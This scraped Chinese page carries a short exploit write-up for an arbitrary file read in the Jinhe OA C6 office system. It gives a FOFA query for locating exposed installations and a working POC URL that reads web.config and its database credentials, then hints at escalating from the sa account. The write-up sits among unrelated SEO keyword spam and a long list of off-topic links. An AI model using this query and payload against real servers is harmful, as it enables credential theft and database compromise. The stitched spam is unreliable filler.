当前位置: 首页 > news >正文

南部县网站建设公司嘉兴app开发公司

南部县网站建设公司,嘉兴app开发公司,茶庄网站模板,wordpress主题企业漏洞描述 金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同…

漏洞描述

金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断地更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。

该OA C6系统的download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器的敏感信息。

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!
在这里插入图片描述

资产确定

fofa:app=“金和网络-金和OA”

漏洞复现

1.执行POC即可获取Web.config文件内容,其中包含数据库账号密码。

http://IP/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

在这里插入图片描述
拿到了sa权限,剩下的不用我说了,大家都懂

修复方案

http://www.yayakq.cn/news/325421/

相关文章:

  • 营销型网站的好处seo的作用
  • 广州网站优化平台河南省人事考试网
  • 免费发布信息网站大全下载安装工程项目管理软件app
  • asp网站开发视频巢湖路桥建设集团网站
  • 公司建立网站的目的jquery网站开发教程
  • 网站的基本类型网站建设安全
  • 网站框架怎么搭建莒南县建设工程网站
  • 怎么做淘宝网站步骤天津做网站的公
  • 长沙企业网站建设案例有一套源码做网站还差什么
  • 广州网站建设+美词wordpress后台太卡
  • 无二制造 网站升级建设中深圳市住房和建设局网站下载
  • 做临时工有哪些网站广河网站建设
  • 网站优化插件新手织梦网建设网站
  • 做影视网站用什么源码开发公司空置房物管费归口什么费用
  • 平安网站建设发挥了积极的作用住房和城乡建设部网站造价师
  • 购物网站开发小结哈尔滨优化网站方法
  • 哪个网站可以接项目做建设部网站注册人员
  • 京东网站建设策划书安卓程序下载安装
  • 做电脑系统最好的网站网站怎么做优化推广
  • 长葛住房和城乡建设局网站类似 wordpress 建站
  • 查企业信息的国家网站网络工程师好学吗
  • 移动端快速建站的方法网页制作教程百度网盘
  • 百度推广网站备案北京的网页建设公司
  • 优秀手机网站设计有哪些类型的网站
  • 产品设计网站官网最新发布的最新
  • 单位做网站的目的郴州网站建设找哪家公司
  • qq恢复官方网站网络营销方案如何写
  • 天津市建设厅注册中心网站深圳楼市最新消息
  • 网站模版idc商务网站建设的基本流程图
  • 移动商务网站开发课程做网站用什么软件好